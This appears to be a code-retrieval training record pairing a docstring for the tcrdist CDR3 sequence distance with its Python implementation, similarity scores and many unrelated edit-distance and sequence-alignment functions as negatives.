get_mismatch_matrix(k,m):\n words = get_words(k)\n N = len(words)\n\n mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n for j in range(i, N):\n if Levenshtein.hamming(words[i], words[j]) <= m:\n mismatch_matrix[i,j] = 1/2\n mismatch_matrix[j,i] = 1/2\n\n return mismatch_matrix", "def edit_distance(str1, str2):\n if len(str1) == 0 or len(str2) == 0:\n return max(len(str1), len(str2))\n if str1[-1] == str2[-1]:\n return edit_distance(str1[:-1], str2[:-1])\n insert = edit_distance(str1, str2[:-1])\n delete = edit_distance(str1[:-1], str2)\n replace = edit_distance(str1[:-1], str2[:-1])\n return min(insert, delete, replace) + 1", "def compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n #score = max([alignment_matrix[row][col] for row in range(len_x + 1) for col in range(len_y+1)])\n\n max_score = -1\n max_positions = []\n for row in range(len(seq_x)+1):\n for col in range(len(seq_y)+1):\n if alignment_matrix[row][col] == max_score:\n max_positions.append((row,col))\n if alignment_matrix[row][col] > max_score:\n max_score = alignment_matrix[row][col]\n max_positions = [(row, col)]\n max_row, max_col = random.choice(max_positions)\n\n #print max_score, max_row, max_col\n\n len_x = max_row\n len_y = max_col\n\n while alignment_matrix[len_x][len_y] > 0:\n #print len_x, len_y\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n #while len_x > 0:\n # align_x = seq_x[len_x-1] + align_x\n # align_y = \"-\" + align_y\n # len_x -= 1\n\n #while len_y > 0:\n # align_x = \"-\" + align_x\n # align_y = seq_y[len_y-1] + align_y\n # len_y -= 1\n\n return (max_score, align_x, align_y)", "def average_distance(l1, l2, distance_function=None):\n\n if not distance_function:\n distance_function = levenshtein_ratio\n counter = 0.0\n numerator = 0.0\n \n #compute array of values\n# if not l1 or not l2:\n# return 1.0\n #make l1 the shortes\n l1, l2 = len(l1)<len(l2) and (l1, l2) or (l2, l1)\n \n #compute the distrances\n distances = []\n for s1 in l1:\n distances += [(distance_function(s1, s2), s1, s2) for s2 in l2]\n# ls.sort(reverse=True)\n# distances.append((ls, s1))\n distances.sort(reverse=True)\n #compute maxima for each colum and each row\n done = set()\n for d, s1, s2 in distances:\n if s1 not in done and s2 not in done:\n done.add(s1)\n done.add(s2) \n counter += d\n numerator += 1\n #if there is a difference in length, we penalize for each item \n difference = len(l2) - len(l1)\n counter += .8 * difference\n numerator += difference\n if numerator == 0:\n return 1.0\n return counter/numerator", "def edit_distance_dp(str_1, m, str_2, n):\n # table for storing sub-problems\n sub = [[0 for i in range(n + 1)] for j in range(m + 1)] # padded for empty cases\n\n # fill table\n for i in range(m + 1):\n for j in range(n + 1):\n if i == 0:\n # str_1 is empty, or we have not selected any substring of it\n sub[i][j] = j # the difference is all of str_2, equivalent to len(str_2) = j removals\n elif j == 0:\n # str_2 is empty, or we have not selected any substring of it\n sub[i][j] = i # the difference is all of str_1, equivalent to len(str_1_ = i removals\n elif str_1[i - 1] == str_2[j - 1]:\n # last chars are equal, so no edits needed; continue for sub-problems\n sub[i][j] = sub[i - 1][j - 1]\n else:\n # last chars are not equal, solve for all 3 subproblems\n insert_char = sub[i][j - 1]\n remove_char = sub[i - 1][j]\n replace_char = sub[i - 1][j - 1]\n sub[i][j] = 1 + min(insert_char, remove_char, replace_char)\n\n return sub[m][n] # solution lies in last cell", "def edit_distance(s1: str, s2: str) -> int:\n # dp[a][b] is the edit distance between s1[:a] and s2[:b]\n dp = [[0 for _ in range(len(s2) + 1)] for _ in range(len(s1) + 1)]\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n dp[i][j] = 0\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n # The two base cases: the empty string compared to another string\n # alway has the edit distance of the length of the other string,\n # because you just insert all of the characters from the other\n # string\n if i == 0:\n dp[i][j] = j\n elif j == 0:\n dp[i][j] = i\n # If the characters are equal, we don't add anything to the edit\n # distance\n elif s1[i - 1] == s2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n # We have 3 cases when the characters aren't equal: we have an\n # insertion, a deletion, or a substitution.\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1],\n dp[i - 1][j - 1]) + 1\n print(dp)\n return dp[-1][-1]", "def needleman_wunsch(\n seq1, seq2, match=1, mismatch=-1, gap_open=-5, gap_extend=-3, at_genome_start=False\n):\n alignments = pairwise2.align.globalms(\n seq1,\n seq2,\n match,\n mismatch,\n gap_open,\n gap_extend,\n )\n # Alignments is a list of tuples. Each tuple has length 5. Entries:\n # 0: seq1 alignment (ie with dashes for indels)\n # 1: seq2 alignemnt\n # 2: alignment score\n # 4, 5: don't know (not using them)\n if len(alignments) == 1:\n return alignments[0][0], alignments[0][1]\n\n if at_genome_start:\n best_pos = last_gap_end_in_string(alignments[0][1])\n else:\n best_pos = alignments[0][1].find(\"-\")\n\n best = alignments[0]\n\n for a in alignments[1:]:\n if at_genome_start:\n gap_pos = last_gap_end_in_string(a[1])\n else:\n gap_pos = a[1].find(\"-\")\n\n if gap_pos > best_pos:\n best = a\n best_pos = gap_pos\n\n return best[0], best[1]", "def edit_distance_dp(str1, str2):\n rows = len(str1) + 1\n cols = len(str2) + 1\n dp_table = [[0 for j in range(cols)] for i in range(rows)]\n\n for row in range(rows):\n for col in range(cols):\n if row == 0 or col == 0:\n dp_table[row][col] = max(row, col)\n \n elif str1[row-1] == str2[col-1]:\n dp_table[row][col] = dp_table[row-1][col-1]\n \n else:\n insert = dp_table[row-1][col]\n delete = dp_table[row][col-1]\n replace = dp_table[row-1][col-1]\n \n dp_table[row][col] = min(insert, delete, replace) + 1\n\n print(dp_table)\n return dp_table[-1][-1]", "def doc_doc_similarity(matrix_a, matrix_b):\n assert matrix_a.shape[1] == matrix_b.shape[0], \"Mismatched shape between matrix A and matrix B\"\n numerator = np.dot(matrix_a, matrix_b)\n assert numerator.shape == (matrix_a.shape[0], matrix_b.shape[1]), numerator.shape\n denominator = np.sqrt(np.sum(matrix_a ** 2, axis=1))[:, np.newaxis] * np.sqrt(\n np.sum(matrix_b.T ** 2, axis=1))[:, np.newaxis].T\n assert (denominator > 0).all(), \"Denominator is zero {}\".format(denominator)\n similarity_matrix = np.multiply(numerator, 1 / denominator)\n return similarity_matrix", "def levenshtein(str1, str2, normalise=False):\n\ttmp = Levenshtein.distance(str1, str2)\n\tif(normalise) and (len(str1) + len(str2)): tmp /= max(len(str1), len(str2))\n\treturn tmp", "def get_alphabet_similarity_matrix(self):\n distance_matrix = numpy.zeros((len(self.alphabet), len(self.alphabet)))\n numpy.fill_diagonal(distance_matrix, 0)\n for index_one, descriptor_one in enumerate(self.descriptors):\n for index_two, descriptor_two in enumerate(self.descriptors):\n distance = descriptor_one - descriptor_two\n squared_distance = numpy.dot(distance, distance)\n distance_matrix[index_one, index_two] = squared_distance\n distance_matrix /= 2. * (self.sigma_amino_acid ** 2)\n return numpy.exp(-distance_matrix)", "def match_matrices(first_matrix_df, second_matrix_df):\n\n first_matrix_array = first_matrix_df.to_numpy()\n second_matrix_array = second_matrix_df.to_numpy()\n\n first_matrix_rows = list(first_matrix_df.index)\n first_matrix_columns = list(first_matrix_df)\n\n second_matrix_rows = list(second_matrix_df.index)\n second_matrix_columns = list(second_matrix_df)\n\n if first_matrix_rows == second_matrix_rows and first_matrix_columns == second_matrix_columns:\n print(\"They match!\")\n\n else:\n print(\"They don't match. Re-arranging ...\")\n\n desired_permutation = []\n for item in second_matrix_columns:\n ind = first_matrix_columns.index(item) # get the correct order of image IDs from distance matrix columns\n desired_permutation.append(ind)\n\n idx = np.empty_like(desired_permutation)\n idx[desired_permutation] = np.arange(len(desired_permutation))\n second_matrix_array[:] = second_matrix_array[:, idx]\n second_matrix_array[:] = second_matrix_array[idx, :]\n\n second_matrix_df = pd.DataFrame(second_matrix_array, columns=first_matrix_columns, index=first_matrix_rows)\n\n return first_matrix_df, second_matrix_df", "def token_stopword_match(a, b, threshold=0.5):\r\n \r\n pos_a = map(get_wordnet_pos, nltk.pos_tag(tokenizer(a)))\r\n pos_b = map(get_wordnet_pos, nltk.pos_tag(tokenizer(b)))\r\n a = [lemmatizer.lemmatize(token.lower(), pos) for token, pos in pos_a\r\n if pos == wordnet.NOUN and token.lower() not in stopwords]\r\n b = [lemmatizer.lemmatize(token.lower(), pos) for token, pos in pos_b\r\n if pos == wordnet.NOUN and token.lower() not in stopwords]\r\n \r\n \r\n # Calculate Jaccard similarity\r\n ratio = len(set(a).intersection(b)) / float(len(set(a).union(b)))\r\n\r\n # return (ratio >= threshold)\r\n return (ratio)", "def levenshtein(w1, w2):\n\n if len(w1) < len(w2):\n # check if length of word1 is smaller than word2.\n # if so, call function and switch parameters\n return levenshtein(w2, w1)\n elif len(w1) == 0:\n # if the length of word1 equals 0, that means that\n # the Lev' distance is the length of word2\n return len(w2)\n elif len(w2) == 0:\n # if the length of word2 equals 0, that means that\n # the Lev' distance is the length of word1\n return len(w1)\n elif w1 == w2:\n # check if words are simply the same\n return 0\n\n # thanks to the check above, we can assume that w2 is the longest word\n # we use this information to determine the range of 'previous'\n previous = range(len(w2) + 1)\n\n # iterate over the characters of the first word\n for a, char1 in enumerate(w1):\n current = [a + 1]\n # iterate over the characters of the second word\n for b, char2 in enumerate(w2):\n inserts = previous[b + 1] + 1\n deletions = current[b] + 1\n subs = previous[b] + (char1 != char2)\n current.append(min(inserts, deletions, subs))\n previous = current\n return previous[-1]", "def compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n alignment_matrix = [[0 for col in range(len_y + 1)] for row in range(len_x + 1)]\n\n for row in range(1, len_x + 1):\n possible_score = alignment_matrix[row-1][0] + scoring_matrix[\"-\"][seq_x[row-1]]\n if global_flag:\n alignment_matrix[row][0] = possible_score\n else:\n alignment_matrix[row][0] = max(0, possible_score)\n\n for col in range(1, len_y+1):\n possible_score = alignment_matrix[0][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n if global_flag:\n alignment_matrix[0][col] = possible_score\n else:\n alignment_matrix[0][col] = max(0, possible_score)\n\n for row in range(1, len_x+1):\n for col in range(1, len_y+1):\n route1 = alignment_matrix[row-1][col-1] + scoring_matrix[seq_x[row-1]][seq_y[col-1]]\n route2 = alignment_matrix[row-1][col] + scoring_matrix[seq_x[row -1]][\"-\"]\n route3 = alignment_matrix[row][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n possible_score = max(route1, route2, route3)\n if global_flag:\n alignment_matrix[row][col] = possible_score\n else:\n alignment_matrix[row][col] = max(0, possible_score)\n\n #for row in alignment_matrix:\n # print row\n\n return alignment_matrix", "def compute_backpointers(s0, s1): #Tillverkar en array med backpointrs\r\n if s0 == None or s1 == None:\r\n raise Exception('Both s0 and s1 have to be set')\r\n rows = len(s0)+1 # antalet rader\r\n columns = len(s1)+1 # antalet kolumner\r\n\r\n ####### Tillverkar Levenshtein matrisen ########\r\n # Gör en tom matris med nollor\r\n distance = [[0 for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # Gör de yttre lagrerna i matrisen 0 -> len(str) vertikalt och horisontellt\r\n for i in range(1,rows):\r\n distance[i][0] = i\r\n for i in range(1,columns):\r\n distance[0][i] = i\r\n\r\n # Beräknar kostnaderna för varje plats inne i matrisen och sätter in dem\r\n # kollar om bokstaven på indexet i de två orden är samma i sådana fall kostar det 0\r\n # och skall ha samma värde som diagonalt innan, annars kostar det 1 från över eller underself.\r\n for column in range(1,columns):\r\n for row in range(1,rows): # kolla varje rad i vare column\r\n if s0[row-1] == s1[column -1]: # om det är samma bokstav kostar det 0\r\n c = 0\r\n else: # annars kostar det 2\r\n c = 2\r\n distance[row][column] = min(distance[row-1][column] + 1,distance[row][column-1] + 1,distance[row-1][column-1] + c)\r\n # raden över säger att det minsta värdet av över eller bredvid + 1 eller diagonalt innan plus (0 eller 2)\r\n # skall sättas in på platsen i matrisen.\r\n\r\n # det minsta avståndet är\r\n cost = distance[row][column]\r\n print(\"totalkostnaden är\")\r\n print(cost)\r\n\r\n\r\n ####### Tillverkar backptr-matrisen ########\r\n # Tillverkar en tom matris med [0,0] för till backptr-matrisen\r\n backptr = [[[0, 0] for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # går igenom platserna i Levenshtein matrisen bakirfrån\r\n for column in range(columns-1,0,-1):\r\n for row in range(rows-1,0,-1):\r\n # Om värdet till vänster är det minsta: peka vänster\r\n if distance[row][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row\r\n backptr[row][column][1] = column -1\r\n # Om värdet över är det minsta: peka upp\r\n if distance[row-1][column] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row -1\r\n backptr[row][column][1] = column\r\n # om värdet diagonalt är minst: peka på diagonalt\r\n if distance[row-1][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row-1\r\n backptr[row][column][1] = column -1\r\n\r\n # Gör yttervärdena i matrisen, (OBS behövs ej)\r\n for i in range(0,rows):\r\n j = i-1\r\n backptr[i][0][0] = j\r\n backptr[i][0][1] = 0\r\n for i in range(0,columns):\r\n j = i-1\r\n backptr[0][i][1] = j\r\n backptr[0][i][0] = 0\r\n\r\n return backptr", "def edit_distance(left_word: str, right_word: str) -> int:\n if len(left_word) != len(right_word):\n raise ValueError(\"Word ladder words must be same length\")\n\n distance = 0;\n for i in range(len(left_word)):\n if left_word[i] != right_word[i]:\n distance += 1\n return distance", "def distances(a, b):\n # 1. Set up a list of lists\n matrix = [[None for i in range(len(b)+1)] for j in range(len(a)+1)]\n\n # 2. Add value for base cases (1st row/column)\n ## First position is always None\n matrix[0][0] = (0, None)\n\n ## 1st row and column\n for i in range(1, len(b) + 1):\n matrix[0][i] = (i, Operation.INSERTED)\n\n\n for j in range(1, len(a) + 1):\n matrix[j][0] = (j, Operation.DELETED)\n\n\n # 3. Add other values - find min of all options\n for i in range(1, len(a)+1):\n for j in range(1, len(b)+1):\n\n if a[i-1] == b[j-1]:\n cost = matrix[i-1][j-1][0]\n operation = Operation.SUBSTITUTED\n matrix[i][j] = (cost, operation)\n\n else:\n # Calculate substitutin, deletion and insertion\n substitution = matrix[i - 1][j - 1][0] + 1\n deletion = matrix[i-1][j][0] + 1\n insertion = matrix[i][j-1][0] + 1\n\n # Compare\n compare = [deletion, insertion, substitution]\n cost = min(compare)\n op = compare.index(min(compare))\n if op == 0:\n operation = Operation.DELETED\n if op == 1:\n operation = Operation.INSERTED\n if op == 2:\n operation = Operation.SUBSTITUTED\n\n matrix[i][j] = (cost, operation)\n return matrix", "def word_rotator_similarity(x, y):\n return 1 - word_rotator_distance(x, y)", "def compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n score = alignment_matrix[len_x][len_y]\n\n while len_x > 0 and len_y > 0:\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n while len_x > 0:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n\n while len_y > 0:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n return (score, align_x, align_y)", "def local_aligner_score(s1, s2, gap_penalty=-1, gap_opening_penalty=-10, edit_function=utils.sub_matrices_distance, matrix=MatrixInfo.pam120):\n\n n_row = len(s1) + 1\n n_col = len(s2) + 1\n # Creates a matrix where the partial scores are stored.\n S = np.zeros((n_row, n_col))\n # Creates a matrix (stored as DataFrame) where the optimal movements are\n # stored.\n backtrack_matrix = pd.DataFrame(\"\", index=np.arange(n_row), columns=np.arange(n_col))\n\n # Initialize the first column and row of the matrices.\n # In the local aligner, we stop when a 0 is encountered, which corresponds to an \"X\"\n for i in range(n_row):\n backtrack_matrix.set_value(i, 0, \"X\")\n\n for j in range(n_col):\n backtrack_matrix.set_value(0, j, \"X\")\n \n # small optimization: keep track of the maximum score encountered so far, and its indices.\n score_max = 0\n i_max = 0\n j_max = 0\n \n for i in range(1, n_row):\n for j in range(1, n_col):\n # Compute the possible movements, and then keeps the best.\n s1_gap = max([S[i - k, j] + utils.gap_function(gap_penalty, gap_opening_penalty, k) for k in range(1, i+1)])\n s2_gap = max([S[i, j - k] + utils.gap_function(gap_penalty, gap_opening_penalty, k) for k in range(1, j+1)])\n mut = S[i - 1, j - 1] + edit_function(s1[i - 1], s2[j - 1], matrix=matrix)\n # In the local aligner, don't accept negative scores!\n S[i, j] = max(s1_gap, s2_gap, mut, 0)\n\n if S[i, j] >= score_max:\n score_max = S[i, j]\n i_max = i\n j_max = j\n # Write in the matrix the movement that lead to that cell, as a string.\n # e.g. \"HV\" means that horizontal and vertical movements were the\n # best.\n # In local alignment, \"X\" means that 0 was the maximum value, and all the movements gave a negative score.\n # The backtracking will stop when an \"X\" is encountered.\n backtrack_matrix.set_value(i, j, \"\".join(check_argmax([s1_gap, s2_gap, mut, 0])))\n \n return [score_max, S, backtrack_matrix, i_max, j_max]", "def calculate_edit_distance(str1, str2, pos1, pos2):\n \n result = None\n \n # If either of the strings is an empty string, return the length\n # of the other string. \n if pos1 == 0:\n result = pos2\n elif pos2 == 0:\n result = pos1\n \n # Check if the last character of the strings are identical. If\n # they are, move on to the next character.\n elif str1[pos1-1] == str2[pos2-1]:\n result = calculate_edit_distance(str1, str2, pos1-1, pos2-1)\n\n # If the last characters are not the same, one character is\n # different between these two strings at the pos 1 and 2. Move on\n # to the next character, and add one to the distance.\n else:\n # Iteratively, find which case holds true. The options are:\n # - insertion in string1\n # - deletion in string1\n # - substitution between strings 1 and 2 at pos1 and pos2.\n # Choose the minimum of the three cases.\n result = 1 + min(calculate_edit_distance(str1, str2, pos1, pos2-1),\n calculate_edit_distance(str1, str2, pos1-1, pos2),\n calculate_edit_distance(str1, str2, pos1-1, pos2-1))\n \n return result", "def edit_distance (str1, str2):\n str1.strip()\n str2.strip()\n if len(str1) != len(str2):\n raise ValueError(\"Strings have to be of equal lengths: \" + str1 + \" and \" + str2)\n\n return sum(bit=='1' for bit in bin(int(binascii.hexlify(xorstr(str1, str2)), 16)))", "def get_exp_mismatch_matrix(k, _lambda):\n\n words = get_words(k)\n N = len(words)\n\n exp_mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n exp_mismatch_matrix[i,i] = 1\n for j in range(i+1, N):\n exp_mismatch_matrix[i,j] = _lambda**Levenshtein.hamming(words[i], words[j])\n exp_mismatch_matrix[j,i] = exp_mismatch_matrix[i,j]\n\n return exp_mismatch_matrix" ]
[ "0.6711283", "0.6683752", "0.6674949", "0.6592512", "0.6581954", "0.64532", "0.64532", "0.6445244", "0.6432772", "0.64265794", "0.63696915", "0.6358784", "0.62909234", "0.62251955", "0.6190301", "0.61244994", "0.6103599", "0.6082008", "0.60701114", "0.60523444", "0.60067487", "0.5975594", "0.5952714", "0.5941617", "0.5930747", "0.59077793", "0.59071326", "0.58838445", "0.5841615", "0.58236533", "0.58162755", "0.57882506", "0.5785298", "0.5772163", "0.57442707", "0.57347715", "0.5734288", "0.5727408", "0.5720689", "0.57201076", "0.570129", "0.5696617", "0.5694825", "0.56810385", "0.56785566", "0.56697315", "0.56646794", "0.5649311", "0.5616305", "0.56147856", "0.5597037", "0.5596028", "0.55936545", "0.55810976", "0.5573607", "0.55526584", "0.5544162", "0.55427736", "0.5542102", "0.55358046", "0.5522649", "0.5522535", "0.55211467", "0.5511286", "0.5509839", "0.54985833", "0.5491787", "0.5464485", "0.5457534", "0.5441571", "0.54398656", "0.54377073", "0.543698", "0.54304564", "0.5430401", "0.5422672", "0.5416042", "0.541154", "0.5394928", "0.53935045", "0.5393371", "0.5392562", "0.5377311", "0.53746617", "0.5370443", "0.53660446", "0.53582764", "0.535582", "0.5343513", "0.5341627", "0.5337994", "0.5335268", "0.53192186", "0.53174734", "0.53093535", "0.5308145", "0.5304678", "0.5300798", "0.5298161", "0.5295226" ]
0.6989441
0
Compute "tcrdist" distance between two TCR CDR3 sequences. Using default weight, gap penalty, ntrim and ctrim is equivalent to the original distance published in Dash et al, (2017). By setting ntrim and ctrim to 0 and adjusting the dist_weight, it is also possible to compute the CDR1/2 loop distances which can be combined with the CDR3 distance for overall distance. See tcrdist2 package for details.
def nb_tcrdist(seq_vec1, seq_vec2, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True): q_L = seq_vec1.shape[0] s_L = seq_vec2.shape[0] if q_L == s_L: """No gaps: substitution distance""" tmp_dist = 0 for i in range(ntrim, q_L - ctrim): tmp_dist += distance_matrix[seq_vec1[i], seq_vec2[i]] return tmp_dist * dist_weight short_len = min(q_L, s_L) len_diff = abs(q_L - s_L) if fixed_gappos: """If we are not aligning, use a fixed gap position relative to the start of the CDR3 that reflects the typically longer and more variable-length contributions to the CDR3 from the J than from the V. For a normal-length CDR3 this would be after the Cys+5 position (ie, gappos = 6; align 6 rsds on N-terminal side of CDR3). Use an earlier gappos if lenshort is less than 11.""" min_gappos = min(6, 3 + (short_len - 5) // 2) max_gappos = min_gappos else: """The CYS and the first G of the GXG are 'aligned' in the beta sheet the alignment seems to continue through roughly CYS+4 ie it's hard to see how we could have an 'insertion' within that region gappos=1 would be a insertion after CYS gappos=5 would be a insertion after CYS+4 (5 rsds before the gap) the full cdr3 ends at the position before the first G so gappos of len(shortseq)-1 would be gap right before the 'G' shifting this back by 4 would be analogous to what we do on the other strand, ie len(shortseq)-1-4""" min_gappos = 5 max_gappos = short_len - 1 - 4 while min_gappos > max_gappos: min_gappos -= 1 max_gappos += 1 min_dist = -1 # min_count = -1 for gappos in range(min_gappos, max_gappos + 1): tmp_dist = 0 # tmp_count = 0 remainder = short_len - gappos for n_i in range(ntrim, gappos): """n_i refers to position relative to N term""" # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]]) tmp_dist += distance_matrix[seq_vec1[n_i], seq_vec2[n_i]] # tmp_count += 1 #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i]) for c_i in range(ctrim, remainder): """c_i refers to position relative to C term, counting upwards from C term""" tmp_dist += distance_matrix[seq_vec1[q_L - 1 - c_i], seq_vec2[s_L - 1 - c_i]] # tmp_count += 1 #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i]) if tmp_dist < min_dist or min_dist == -1: min_dist = tmp_dist # min_count = tmp_count if min_dist == 0: break """Note that weight_cdr3_region is not applied to the gap penalty""" return min_dist * dist_weight + len_diff * gap_penalty
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n for i in range(ntrim, q_L - ctrim):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight\n continue\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty\n return dist", "def computeCDR3PWDist(seqs, gap_open=3, gap_extend=3, matrix=parasail.blosum62, useIdentity=False):\n cache = CachedNWDistance(seqs, matrix=matrix, gap_open=gap_open, gap_extend=gap_extend, useIdentity=useIdentity)\n\n indices = cache.indices()\n L = indices.shape[0]\n pwdist = np.nan * np.zeros((L, L))\n \n for i, j in itertools.product(range(L), range(L)):\n \n if i <= j:\n d = cache.metric(indices[i], indices[j])\n pwdist[i, j] = d\n pwdist[j, i] = d\n\n pwdist = pd.DataFrame(pwdist, columns=cache.elements, index=cache.elements)\n return pwdist", "def distance_3D(c1, c2):\n return np.sqrt((c1[0] - c2[0]) ** 2 + (c1[1] - c2[1]) ** 2 + (c1[2] - c2[2]) ** 2)", "def test_cdtw(self):\n np.random.seed(1)\n M = 100\n N = 150\n t1 = np.linspace(0, 1, M)\n X = np.zeros((M, 2), dtype=np.float32)\n X[:, 0] = np.cos(2*np.pi*t1)\n X[:, 1] = np.sin(8*np.pi*t1)\n ## Sample an element from a dictionary of parameterizations\n ## and use this parameterization to interpolate the original\n ## time series\n D = linmdtw.alignmenttools.get_parameterization_dict(N)\n s = linmdtw.alignmenttools.sample_parameterization_dict(D, 4)\n Y = linmdtw.alignmenttools.get_interpolated_euclidean_timeseries(X, s)\n\n cost10 = linmdtw.get_path_cost(X, Y, linmdtw.cdtw(X, Y, 10))\n cost10_T = linmdtw.get_path_cost(Y, X, linmdtw.cdtw(Y, X, 10))\n assert(cost10 == cost10_T)\n cost4 = linmdtw.get_path_cost(X, Y, linmdtw.cdtw(X, Y, 4))\n cost4_T = linmdtw.get_path_cost(Y, X, linmdtw.cdtw(Y, X, 4))\n assert(cost4 == cost4_T)\n assert(cost10 < cost4)\n assert(cost10_T < cost4_T)", "def func_c_align_split_n(self, args):\n tik_instance, ub_ori, ub_trans, n_before, n_len = args\n\n n_d, d_d, h_d, w_d, c_d = self.dst_shape\n dhw_d = d_d * h_d * w_d\n hw_d = h_d * w_d\n\n data_offset = n_before * self.c_0\n ub_offset = 0\n ori_nburst = dhw_d * self.c_1\n burst_len = n_len * self.c_0 // self.cp_align_len\n src_stride = (n_d - n_len) * self.c_0 // self.cp_align_len\n dst_stride = 0\n args = tik_instance, self.src_gm, ub_ori, data_offset, ub_offset, \\\n ori_nburst, burst_len, src_stride, dst_stride, self.cp_align_len\n _gm_to_ub_one(args)\n\n hwnoni = hw_d * n_len\n with tik_instance.for_range(0, d_d) as num_d:\n with tik_instance.for_range(0, self.c_1) as num_c1:\n ori_cur = num_d * self.c_1 * hwnoni * self.c_0 \\\n + num_c1 * hwnoni * self.c_0\n trans_cur = num_d * self.c_1 * hwnoni * self.c_0 \\\n + num_c1 * self.c_0\n nburst = hwnoni\n burst_len = self.c_0 // self.cp_align_len\n src_stride = 0\n dst_stride = (self.c_1 - 1) * self.c_0 // self.cp_align_len\n tik_instance.data_move(\n ub_trans[trans_cur],\n ub_ori[ori_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n with tik_instance.for_range(0, dhw_d) as num_dhw:\n src_cur = num_dhw * n_len * c_d\n dst_cur = num_dhw * c_d\n nburst = n_len\n burst_len = c_d // self.cp_align_len\n src_stride = 0\n dst_stride = (dhw_d - 1) * c_d // self.cp_align_len\n tik_instance.data_move(\n ub_ori[dst_cur],\n ub_trans[src_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n dst_offset = n_before * dhw_d * c_d\n burst_len = n_len * dhw_d * c_d // self.cp_align_len\n tik_instance.data_move(self.dst_gm[dst_offset],\n ub_ori,\n 0, 1, burst_len, 0, 0)", "def chord_dist(n1, n2):\n return min(((n2.node_id - n1.node_id) % (2 ** config.ring_size_bits)),\n ((n1.node_id - n2.node_id) % (2 ** config.ring_size_bits)),\n ) / float(2 